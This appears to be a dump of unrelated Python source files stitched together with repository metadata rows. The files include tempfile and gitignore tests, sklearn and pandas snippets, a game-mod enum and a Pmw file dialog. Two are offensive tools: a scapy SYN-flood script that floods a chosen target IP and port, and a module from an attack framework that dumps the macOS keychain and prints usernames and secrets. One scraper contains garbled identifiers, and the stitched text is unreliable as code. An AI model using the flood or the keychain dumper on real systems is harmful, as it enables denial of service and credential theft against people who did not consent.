class TestTemporaryDirectory(BaseTestCase):
"""Test TemporaryDirectory()."""
def do_create(self, dir=None, pre="", suf="", recurse=1):
if dir is None:
dir = tempfile.gettempdir()
tmp = tempfile.TemporaryDirectory(dir=dir, prefix=pre, suffix=suf)
self.nameCheck(tmp.name, dir, pre, suf)
# Create a subdirectory and some files
if recurse:
d1 = self.do_create(tmp.name, pre, suf, recurse-1)
d1.name = None
with open(os.path.join(tmp.name, "test.txt"), "wb") as f:
f.write(b"Hello world!")
return tmp
def test_mkdtemp_failure(self):
# Check no additional exception if mkdtemp fails
# Previously would raise AttributeError instead
# (noted as part of Issue #10188)
with tempfile.TemporaryDirectory() as nonexistent:
pass
with self.assertRaises(FileNotFoundError) as cm:
tempfile.TemporaryDirectory(dir=nonexistent)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_explicit_cleanup(self):
# A TemporaryDirectory is deleted when cleaned up
dir = tempfile.mkdtemp()
try:
d = self.do_create(dir=dir)
self.assertTrue(os.path.exists(d.name),
"TemporaryDirectory %s does not exist" % d.name)
d.cleanup()
self.assertFalse(os.path.exists(d.name),
"TemporaryDirectory %s exists after cleanup" % d.name)
finally:
os.rmdir(dir)
@support.skip_unless_symlink
def test_cleanup_with_symlink_to_a_directory(self):
# cleanup() should not follow symlinks to directories (issue #12464)
d1 = self.do_create()
d2 = self.do_create(recurse=0)
# Symlink d1/foo -> d2
os.symlink(d2.name, os.path.join(d1.name, "foo"))
# This call to cleanup() should not follow the "foo" symlink
d1.cleanup()
self.assertFalse(os.path.exists(d1.name),
"TemporaryDirectory %s exists after cleanup" % d1.name)
self.assertTrue(os.path.exists(d2.name),
"Directory pointed to by a symlink was deleted")
self.assertEqual(os.listdir(d2.name), ['test.txt'],
"Contents of the directory pointed to by a symlink "
"were deleted")
d2.cleanup()
@support.cpython_only
def test_del_on_collection(self):
# A TemporaryDirectory is deleted when garbage collected
dir = tempfile.mkdtemp()
try:
d = self.do_create(dir=dir)
name = d.name
del d # Rely on refcounting to invoke __del__
self.assertFalse(os.path.exists(name),
"TemporaryDirectory %s exists after __del__" % name)
finally:
os.rmdir(dir)
def test_del_on_shutdown(self):
# A TemporaryDirectory may be cleaned up during shutdown
with self.do_create() as dir:
for mod in ('builtins', 'os', 'shutil', 'sys', 'tempfile', 'warnings'):
code = """if True:
import builtins
import os
import shutil
import sys
import tempfile
import warnings
tmp = tempfile.TemporaryDirectory(dir={dir!r})
sys.stdout.buffer.write(tmp.name.encode())
tmp2 = os.path.join(tmp.name, 'test_dir')
os.mkdir(tmp2)
with open(os.path.join(tmp2, "test.txt"), "w") as f:
f.write("Hello world!")
{mod}.tmp = tmp
warnings.filterwarnings("always", category=ResourceWarning)
""".format(dir=dir, mod=mod)
rc, out, err = script_helper.assert_python_ok("-c", code)
tmp_name = out.decode().strip()
self.assertFalse(os.path.exists(tmp_name),
"TemporaryDirectory %s exists after cleanup" % tmp_name)
err = err.decode('utf-8', 'backslashreplace')
self.assertNotIn("Exception ", err)
self.assertIn("ResourceWarning: Implicitly cleaning up", err)
def test_warnings_on_cleanup(self):
# ResourceWarning will be triggered by __del__
with self.do_create() as dir:
d = self.do_create(dir=dir, recurse=3)
name = d.name
# Check for the resource warning
with support.check_warnings(('Implicitly', ResourceWarning), quiet=False):
warnings.filterwarnings("always", category=ResourceWarning)
del d
support.gc_collect()
self.assertFalse(os.path.exists(name),
"TemporaryDirectory %s exists after __del__" % name)
def test_multiple_close(self):
# Can be cleaned-up many times without error
d = self.do_create()
d.cleanup()
d.cleanup()
d.cleanup()
def test_context_manager(self):
# Can be used as a context manager
d = self.do_create()
with d as name:
self.assertTrue(os.path.exists(name))
self.assertEqual(name, d.name)
self.assertFalse(os.path.exists(name))
def test_main():
support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
| [
"[email protected]"
] | |
43a04e5ac41572106ab3ff879af6d0b36c7e0e92 | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Data Science and Mechine Leraning/99.py | a816c6cc8a35dc07365ddd5a9e3c00881cf640da | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | import numpy as np
import pandas as pd
li = {'A': [1, 2, np.nan], 'B': [1, np.nan, np.nan], 'C': [1, 2, 3]}
li2 = pd.DataFrame(li)
li3 = li2.fillna(value='FILL VALUE')
print(li3) | [
"[email protected]"
] | |
ccbd6d4fef4e78de38c9276cc38f6fa7330b80d5 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/097_beautifulsoup_ii_scrape_us_holidays/save1_passed.py | 23b546430bed3f5a69c3ef251e95a5ae2acb06fc | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,037 | py | from collections import defaultdict
import os
from u__.r.. import u..
from bs4 import BeautifulSoup
# prep data
tmp = os.getenv("TMP", "/tmp")
page = 'us_holidays.html'
holidays_page = os.path.join(tmp, page)
u..(
f'https://bites-data.s3.us-east-2.amazonaws.com/{page}',
holidays_page
)
with open(holidays_page) as f:
content = f.read()
holidays = defaultdict(list)
def get_us_bank_holidays(content=content):
"""Receive scraped html output, make a BS object, parse the bank
holiday table (css class = list-table), and return a dict of
keys -> months and values -> list of bank holidays"""
soup = BeautifulSoup(content, 'html.parser')
right_table = soup.find('table', {'class': 'list-table'})
dates = []
for row in right_table.findAll('time'):
dates.append(row.text[5:7])
holiday = []
for row in right_table.findAll('a'):
holiday.append(row.text.strip())
l = zip(dates, holiday)
for k, v in l:
holidays[k].append(v)
return holidays | [
"[email protected]"
] | |
bb02dddbd6ef8c599eda31ca5a6d7365c3f4b787 | 636ba2700eaf3a151b73144b510f38c75ab1919d | /ml/m11_kfold_estimators2_cancer.py | 83c224be41b0db487d18733b67d449cc86ebf928 | [] | no_license | Taerimmm/ML | 17997f388e18c28dfd9de83af98a6d4bebe7e1f0 | 6147cede81ebcc95f21adebf75731fbbb11edfab | refs/heads/master | 2023-06-10T14:26:45.335219 | 2021-07-05T15:30:47 | 2021-07-05T15:30:47 | 324,874,959 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | from sklearn.model_selection import train_test_split, KFold, cross_val_score
from sklearn.metrics import accuracy_score
from sklearn.utils import all_estimators
from sklearn.datasets import load_breast_cancer
import warnings
warnings.filterwarnings('ignore')
dataset = load_breast_cancer()
x = dataset.data
y = dataset.target
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)
kfold = KFold(n_splits=5, shuffle=True)
import sklearn
print(sklearn.__version__) # 0.23.2
# all_estimators -> 0.20 에 최적화되어있다.
allAlgorithms = all_estimators(type_filter='classifier') # sklearn의 분류형 모델 전체
# print(allAlgorithms)
for (name, algorithm) in allAlgorithms:
try :
model = algorithm()
scores = cross_val_score(model, x_train, y_train, cv=kfold) # cv=5 도 가능 / 이때 shuffle=False
print(name, '의 정답율 :\n', scores)
except :
# continue
print(name, '은 없는 놈') # 0.23.2 에 없는 algorithm
# 기준이 되는 지표로 삼을 수 있다.
| [
"[email protected]"
] | |
1ced1e5bd8b38f823f7c72e74c340613a4c11f63 | a9c0daa4a7b9a4d7341afcab270c5b5debb8c13f | /env/lib/python3.6/site-packages/pathspec/tests/test_gitignore.py | af1ee7a82daa8a6f90fb940d7c15e127faf3eb7e | [] | no_license | phamcong/alienator-plf | bad8c4e003fd189c43243b31ef2b975b6f154754 | ea65628af66fbca51f2248ceb4ba93f858dbddce | refs/heads/master | 2022-11-26T01:28:38.286261 | 2017-11-07T15:12:08 | 2017-11-07T15:12:08 | 109,412,097 | 0 | 1 | null | 2020-07-25T23:43:17 | 2017-11-03T15:30:22 | JavaScript | UTF-8 | Python | false | false | 5,066 | py | # encoding: utf-8
"""
This script tests ``GitIgnorePattern``.
"""
import unittest
import pathspec.util
from pathspec import GitIgnorePattern
class GitIgnoreTest(unittest.TestCase):
"""
The ``GitIgnoreTest`` class tests the ``GitIgnorePattern``
implementation.
"""
def test_00_empty(self):
"""
Tests an empty pattern.
"""
spec = GitIgnorePattern('')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_01_absolute_root(self):
"""
Tests a single root absolute path pattern.
This should NOT match any file (according to git check-ignore (v2.4.1)).
"""
spec = GitIgnorePattern('/')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_01_absolute(self):
"""
Tests an absolute path pattern.
This should match:
an/absolute/file/path
an/absolute/file/path/foo
This should NOT match:
foo/an/absolute/file/path
"""
spec = GitIgnorePattern('/an/absolute/file/path')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^an/absolute/file/path(?:/.*)?$')
def test_01_relative(self):
"""
Tests a relative path pattern.
This should match:
spam
spam/
foo/spam
spam/foo
foo/spam/bar
"""
spec = GitIgnorePattern('spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')
def test_01_relative_nested(self):
"""
Tests a relative nested path pattern.
This should match:
foo/spam
foo/spam/bar
This should **not** match (according to git check-ignore (v2.4.1)):
bar/foo/spam
"""
spec = GitIgnorePattern('foo/spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^foo/spam(?:/.*)?$')
def test_02_comment(self):
"""
Tests a comment pattern.
"""
spec = GitIgnorePattern('# Cork soakers.')
self.assertIsNone(spec.include)
self.assertIsNone(spec.regex)
def test_02_ignore(self):
"""
Tests an exclude pattern.
This should NOT match (according to git check-ignore (v2.4.1)):
temp/foo
"""
spec = GitIgnorePattern('!temp')
self.assertIsNotNone(spec.include)
self.assertFalse(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?temp$')
def test_03_child_double_asterisk(self):
"""
Tests a directory name with a double-asterisk child
directory.
This should match:
spam/bar
This should **not** match (according to git check-ignore (v2.4.1)):
foo/spam/bar
"""
spec = GitIgnorePattern('spam/**')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^spam/.*$')
def test_03_inner_double_asterisk(self):
"""
Tests a path with an inner double-asterisk directory.
This should match:
left/bar/right
left/foo/bar/right
left/bar/right/foo
This should **not** match (according to git check-ignore (v2.4.1)):
foo/left/bar/right
"""
spec = GitIgnorePattern('left/**/right')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^left(?:/.+)?/right(?:/.*)?$')
def test_03_only_double_asterisk(self):
"""
Tests a double-asterisk pattern which matches everything.
"""
spec = GitIgnorePattern('**')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^.+$')
def test_03_parent_double_asterisk(self):
"""
Tests a file name with a double-asterisk parent directory.
This should match:
foo/spam
foo/spam/bar
"""
spec = GitIgnorePattern('**/spam')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')
def test_04_infix_wildcard(self):
"""
Tests a pattern with an infix wildcard.
This should match:
foo--bar
foo-hello-bar
a/foo-hello-bar
foo-hello-bar/b
a/foo-hello-bar/b
"""
spec = GitIgnorePattern('foo-*-bar')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?foo\\-[^/]*\\-bar(?:/.*)?$')
def test_04_postfix_wildcard(self):
"""
Tests a pattern with a postfix wildcard.
This should match:
~temp-
~temp-foo
~temp-foo/bar
foo/~temp-bar
foo/~temp-bar/baz
"""
spec = GitIgnorePattern('~temp-*')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?\\~temp\\-[^/]*(?:/.*)?$')
def test_04_prefix_wildcard(self):
"""
Tests a pattern with a prefix wildcard.
This should match:
bar.py
bar.py/
foo/bar.py
foo/bar.py/baz
"""
spec = GitIgnorePattern('*.py')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?[^/]*\\.py(?:/.*)?$')
def test_05_directory(self):
"""
Tests a directory pattern.
This should match:
dir/
foo/dir/
foo/dir/bar
This should **not** match:
dir
"""
spec = GitIgnorePattern('dir/')
self.assertTrue(spec.include)
self.assertEqual(spec.regex.pattern, '^(?:.+/)?dir/.*$')
def test_05_registered(self):
"""
Tests that the pattern is registered.
"""
self.assertIs(pathspec.util.lookup_pattern('gitignore'), GitIgnorePattern)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(GitIgnoreTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"[email protected]"
] | |
e914343fa85ca6d3f23aeda9938362687fbe0344 | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc146/abc146_c/8937880.py | ee9c12a0ce700fce574a65e29313213efa3efaa3 | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | A, B, X = map(int, input().split())
minN = 1
maxN = 10**9
ans = 0
while(1):
N = (minN + maxN) // 2
n = A*N + len(str(N))*B
if n <= X:
ans = N
if minN == maxN:
break
if n < X:
minN = N+1
else:
maxN = N
print(ans)
| [
"[email protected]"
] | |
30ac3811a3b1bd1fe781ad76f925c49dc1176111 | 84888c7f9d6d7195917053b2d14b2d30e1e5e375 | /stress_testing/tcp_syn_flood.py | 165848ca4522c0e0c341fb99281fc5f23da65896 | [] | no_license | codeandrew/offensivesecurity-python | a8d48c565d2434430e6f0e3069385b19dfbdef60 | 364ff7233c31a4a853f9ef185f96078e50c7bef4 | refs/heads/master | 2023-08-17T11:23:44.852329 | 2023-08-02T14:54:37 | 2023-08-02T14:54:37 | 242,969,080 | 12 | 5 | null | 2023-09-04T16:45:25 | 2020-02-25T10:10:59 | Python | UTF-8 | Python | false | false | 628 | py | from scapy.all import *
import sys
def main(target_ip, target_port, rounds=10_000):
print(f"Target IP: {target_ip}")
print(f"Target Port: {target_port}")
print(f"Rounds: {rounds}")
# Define the payload to send in the packets
payload = "A" * 1024
# Create a loop to send a large number of packets to the target
for i in range(rounds):
packet = IP(dst=target_ip) / TCP(dport=target_port, flags="S") / payload
send(packet, verbose=False)
if __name__ == "__main__":
target_ip = sys.argv[1]
target_port = int(sys.argv[2])
main(target_ip=target_ip, target_port=target_port)
| [
"[email protected]"
] | |
7c9e003239f263252fb0adea540bb5e1962cd733 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /src/sims4communitylib/enums/common_species.py | eacddcd09423a491b7c32754f111f81175abc65a | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from sims.sim_info import SimInfo
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonSpecies(CommonInt):
"""Custom Species enum containing all species (including extended species).
"""
INVALID: 'CommonSpecies' = 0
HUMAN: 'CommonSpecies' = 1
SMALL_DOG: 'CommonSpecies' = 2
LARGE_DOG: 'CommonSpecies' = 3
CAT: 'CommonSpecies' = 4
@staticmethod
def get_species(sim_info: SimInfo) -> 'CommonSpecies':
"""Retrieve the CommonSpecies of a sim. Use this instead of CommonSpeciesUtils.get_species to determine a more specific species.
"""
from sims4communitylib.utils.sims.common_species_utils import CommonSpeciesUtils
if CommonSpeciesUtils.is_human(sim_info):
return CommonSpecies.HUMAN
elif CommonSpeciesUtils.is_small_dog(sim_info):
return CommonSpecies.SMALL_DOG
elif CommonSpeciesUtils.is_large_dog(sim_info):
return CommonSpecies.LARGE_DOG
elif CommonSpeciesUtils.is_cat(sim_info):
return CommonSpecies.CAT
return CommonSpecies.INVALID
| [
"[email protected]"
] | |
413f0b7b9ab12d75b76ef41418717665a490a242 | d489eb7998aa09e17ce8d8aef085a65f799e6a02 | /lib/modules/python/collection/osx/keychaindump_decrypt.py | 64015ea23ade2de15835ef86ce40b32770ac9187 | [
"MIT"
] | permissive | fengjixuchui/invader | d36078bbef3d740f95930d9896b2d7dd7227474c | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | refs/heads/master | 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 | MIT | 2019-09-26T11:32:39 | 2019-09-07T11:32:17 | PowerShell | UTF-8 | Python | false | false | 3,432 | py | class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Sandbox-Keychain-Dump',
# list of one or more authors for the module
'Author': ['@import-au'],
# more verbose multi-line description of the module
'Description': ("Uses Apple Security utility to dump the contents of the keychain. "
"WARNING: Will prompt user for access to each key."
"On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
""
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description': 'File to output AppleScript to, otherwise displayed on the screen.',
'Required': False,
'Value': ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = r"""
import subprocess
import re
process = subprocess.Popen('/usr/bin/security dump-keychain -d', stdout=subprocess.PIPE, shell=True)
keychain = process.communicate()
find_account = re.compile('0x00000007\s\<blob\>\=\"([^\"]+)\"\n.*\n.*\"acct\"\<blob\>\=\"([^\"]+)\"\n.*\n.*\n.*\n\s+\"desc\"\<blob\>\=([^\n]+)\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\ndata\:\n([^\n]+)')
accounts = find_account.findall(keychain[0])
for account in accounts:
print("System: " + account[0])
print("Description: " + account[2])
print("Username: " + account[1])
print("Secret: " + account[3])
"""
return script
| [
"[email protected]"
] | |
c1f9bdee162eb8870f5e99d07e1132ddbc03d481 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_14019.py | 78da2db51c32750262ee6905da1673496452c3d7 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | # If comparison statements in Python
random.randint
| [
"[email protected]"
] | |
25e0f060c6bbb381ef0adce82ef475fb49accea2 | 7a23870e9b0b56b112f634d26760282ff7a4f46c | /Projects/Archived Tk code/From extensions folder/Pmw/Pmw_1_3/contrib/PmwFileDialog.py | b11001ca1e80505bdb49d27b9cd04f81218da196 | [] | no_license | leo-editor/leo-editor-contrib | 0c671998c4ec7fd7c4ce890a201395afe340481b | 28c22721e1bc313c120a8a6c288893bc566a5c67 | refs/heads/master | 2023-06-25T04:28:54.520792 | 2023-06-14T20:18:12 | 2023-06-14T20:18:12 | 16,771,641 | 6 | 6 | null | 2023-06-09T11:26:42 | 2014-02-12T15:28:36 | Python | UTF-8 | Python | false | false | 14,836 | py | #
__version__ = '$Id: PmwFileDialog.py,v 1.1 2007/12/13 16:06:01 edream Exp $'
#
# Filename dialogs using Pmw
#
# (C) Rob W.W. Hooft, Nonius BV, 1998
#
# Modifications:
#
# J. Willem M. Nissink, Cambridge Crystallographic Data Centre, 8/2002
# Added optional information pane at top of dialog; if option
# 'info' is specified, the text given will be shown (in blue).
# Modified example to show both file and directory-type dialog
#
# No Guarantees. Distribute Freely.
# Please send bug-fixes/patches/features to <[email protected]>
#
################################################################################
import os,fnmatch,time
import Tkinter,Pmw
#Pmw.setversion("0.8.5")
def _errorpop(master,text):
d=Pmw.MessageDialog(master,
title="Error",
message_text=text,
buttons=("OK",))
d.component('message').pack(ipadx=15,ipady=15)
d.activate()
d.destroy()
class PmwFileDialog(Pmw.Dialog):
"""File Dialog using Pmw"""
def __init__(self, parent = None, **kw):
# Define the megawidget options.
optiondefs = (
('filter', '*', self.newfilter),
('directory', os.getcwd(), self.newdir),
('filename', '', self.newfilename),
('historylen',10, None),
('command', None, None),
('info', None, None),
)
self.defineoptions(kw, optiondefs)
# Initialise base class (after defining options).
Pmw.Dialog.__init__(self, parent)
self.withdraw()
# Create the components.
interior = self.interior()
if self['info'] is not None:
rowoffset=1
dn = self.infotxt()
dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
else:
rowoffset=0
dn = self.mkdn()
dn.grid(row=0+rowoffset,column=0,columnspan=2,padx=3,pady=3)
del dn
# Create the directory list component.
dnb = self.mkdnb()
dnb.grid(row=1+rowoffset,column=0,sticky='news',padx=3,pady=3)
del dnb
# Create the filename list component.
fnb = self.mkfnb()
fnb.grid(row=1+rowoffset,column=1,sticky='news',padx=3,pady=3)
del fnb
# Create the filter entry
ft = self.mkft()
ft.grid(row=2+rowoffset,column=0,columnspan=2,padx=3,pady=3)
del ft
# Create the filename entry
fn = self.mkfn()
fn.grid(row=3+rowoffset,column=0,columnspan=2,padx=3,pady=3)
fn.bind('<Return>',self.okbutton)
del fn
# Buttonbox already exists
bb=self.component('buttonbox')
bb.add('OK',command=self.okbutton)
bb.add('Cancel',command=self.cancelbutton)
del bb
Pmw.alignlabels([self.component('filename'),
self.component('filter'),
self.component('dirname')])
def infotxt(self):
""" Make information block component at the top """
return self.createcomponent(
'infobox',
(), None,
Tkinter.Label, (self.interior(),),
width=51,
relief='groove',
foreground='darkblue',
justify='left',
text=self['info']
)
def mkdn(self):
"""Make directory name component"""
return self.createcomponent(
'dirname',
(), None,
Pmw.ComboBox, (self.interior(),),
entryfield_value=self['directory'],
entryfield_entry_width=40,
entryfield_validate=self.dirvalidate,
selectioncommand=self.setdir,
labelpos='w',
label_text='Directory:')
def mkdnb(self):
"""Make directory name box"""
return self.createcomponent(
'dirnamebox',
(), None,
Pmw.ScrolledListBox, (self.interior(),),
label_text='directories',
labelpos='n',
hscrollmode='none',
dblclickcommand=self.selectdir)
def mkft(self):
"""Make filter"""
return self.createcomponent(
'filter',
(), None,
Pmw.ComboBox, (self.interior(),),
entryfield_value=self['filter'],
entryfield_entry_width=40,
selectioncommand=self.setfilter,
labelpos='w',
label_text='Filter:')
def mkfnb(self):
"""Make filename list box"""
return self.createcomponent(
'filenamebox',
(), None,
Pmw.ScrolledListBox, (self.interior(),),
label_text='files',
labelpos='n',
hscrollmode='none',
selectioncommand=self.singleselectfile,
dblclickcommand=self.selectfile)
def mkfn(self):
"""Make file name entry"""
return self.createcomponent(
'filename',
(), None,
Pmw.ComboBox, (self.interior(),),
entryfield_value=self['filename'],
entryfield_entry_width=40,
entryfield_validate=self.filevalidate,
selectioncommand=self.setfilename,
labelpos='w',
label_text='Filename:')
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def filevalidate(self,string):
if string=='':
return Pmw.PARTIAL
elif os.path.isfile(string):
return Pmw.OK
elif os.path.exists(string):
return Pmw.PARTIAL
else:
return Pmw.OK
def okbutton(self):
"""OK action: user thinks he has input valid data and wants to
proceed. This is also called by <Return> in the filename entry"""
fn=self.component('filename').get()
self.setfilename(fn)
if self.validate(fn):
self.canceled=0
self.deactivate()
def cancelbutton(self):
"""Cancel the operation"""
self.canceled=1
self.deactivate()
def tidy(self,w,v):
"""Insert text v into the entry and at the top of the list of
the combobox w, remove duplicates"""
if not v:
return
entry=w.component('entry')
entry.delete(0,'end')
entry.insert(0,v)
list=w.component('scrolledlist')
list.insert(0,v)
index=1
while index<list.index('end'):
k=list.get(index)
if k==v or index>self['historylen']:
list.delete(index)
else:
index=index+1
w.checkentry()
def setfilename(self,value):
if not value:
return
value=os.path.join(self['directory'],value)
dir,fil=os.path.split(value)
self.configure(directory=dir,filename=value)
c=self['command']
if callable(c):
c()
def newfilename(self):
"""Make sure a newly set filename makes it into the combobox list"""
self.tidy(self.component('filename'),self['filename'])
def setfilter(self,value):
self.configure(filter=value)
def newfilter(self):
"""Make sure a newly set filter makes it into the combobox list"""
self.tidy(self.component('filter'),self['filter'])
self.fillit()
def setdir(self,value):
self.configure(directory=value)
def newdir(self):
"""Make sure a newly set dirname makes it into the combobox list"""
self.tidy(self.component('dirname'),self['directory'])
self.fillit()
def singleselectfile(self):
"""Single click in file listbox. Move file to "filename" combobox"""
cs=self.component('filenamebox').curselection()
if cs!=():
value=self.component('filenamebox').get(cs)
self.setfilename(value)
def selectfile(self):
"""Take the selected file from the filename, normalize it, and OK"""
self.singleselectfile()
value=self.component('filename').get()
self.setfilename(value)
if value:
self.okbutton()
def selectdir(self):
"""Take selected directory from the dirnamebox into the dirname"""
cs=self.component('dirnamebox').curselection()
if cs!=():
value=self.component('dirnamebox').get(cs)
dir=self['directory']
if not dir:
dir=os.getcwd()
if value:
if value=='..':
dir=os.path.split(dir)[0]
else:
dir=os.path.join(dir,value)
self.configure(directory=dir)
self.fillit()
def askfilename(self,directory=None,filter=None):
"""The actual client function. Activates the dialog, and
returns only after a valid filename has been entered
(return value is that filename) or when canceled (return
value is None)"""
if directory!=None:
self.configure(directory=directory)
if filter!=None:
self.configure(filter=filter)
self.fillit()
self.canceled=1 # Needed for when user kills dialog window
self.activate()
if self.canceled:
return None
else:
return self.component('filename').get()
lastdir=""
lastfilter=None
lasttime=0
def fillit(self):
"""Get the directory list and show it in the two listboxes"""
# Do not run unnecesarily
if self.lastdir==self['directory'] and self.lastfilter==self['filter'] and self.lasttime>os.stat(self.lastdir)[8]:
return
self.lastdir=self['directory']
self.lastfilter=self['filter']
self.lasttime=time.time()
dir=self['directory']
if not dir:
dir=os.getcwd()
dirs=['..']
files=[]
try:
fl=os.listdir(dir)
fl.sort()
except os.error,arg:
if arg[0] in (2,20):
return
raise
for f in fl:
if os.path.isdir(os.path.join(dir,f)):
dirs.append(f)
else:
filter=self['filter']
if not filter:
filter='*'
if fnmatch.fnmatch(f,filter):
files.append(f)
self.component('filenamebox').setlist(files)
self.component('dirnamebox').setlist(dirs)
def validate(self,filename):
"""Validation function. Should return 1 if the filename is valid,
0 if invalid. May pop up dialogs to tell user why. Especially
suited to subclasses: i.e. only return 1 if the file does/doesn't
exist"""
return 1
class PmwDirDialog(PmwFileDialog):
"""Directory Dialog using Pmw"""
def __init__(self, parent = None, **kw):
# Define the megawidget options.
optiondefs = (
('directory', os.getcwd(), self.newdir),
('historylen',10, None),
('command', None, None),
('info', None, None),
)
self.defineoptions(kw, optiondefs)
# Initialise base class (after defining options).
Pmw.Dialog.__init__(self, parent)
self.withdraw()
# Create the components.
interior = self.interior()
if self['info'] is not None:
rowoffset=1
dn = self.infotxt()
dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
else:
rowoffset=0
dn = self.mkdn()
dn.grid(row=1+rowoffset,column=0,columnspan=2,padx=3,pady=3)
dn.bind('<Return>',self.okbutton)
del dn
# Create the directory list component.
dnb = self.mkdnb()
dnb.grid(row=0+rowoffset,column=0,columnspan=2,sticky='news',padx=3,pady=3)
del dnb
# Buttonbox already exists
bb=self.component('buttonbox')
bb.add('OK',command=self.okbutton)
bb.add('Cancel',command=self.cancelbutton)
del bb
lastdir=""
def fillit(self):
"""Get the directory list and show it in the two listboxes"""
# Do not run unnecesarily
if self.lastdir==self['directory']:
return
self.lastdir=self['directory']
dir=self['directory']
if not dir:
dir=os.getcwd()
dirs=['..']
try:
fl=os.listdir(dir)
fl.sort()
except os.error,arg:
if arg[0] in (2,20):
return
raise
for f in fl:
if os.path.isdir(os.path.join(dir,f)):
dirs.append(f)
self.component('dirnamebox').setlist(dirs)
def okbutton(self):
"""OK action: user thinks he has input valid data and wants to
proceed. This is also called by <Return> in the dirname entry"""
fn=self.component('dirname').get()
self.configure(directory=fn)
if self.validate(fn):
self.canceled=0
self.deactivate()
def askfilename(self,directory=None):
"""The actual client function. Activates the dialog, and
returns only after a valid filename has been entered
(return value is that filename) or when canceled (return
value is None)"""
if directory!=None:
self.configure(directory=directory)
self.fillit()
self.activate()
if self.canceled:
return None
else:
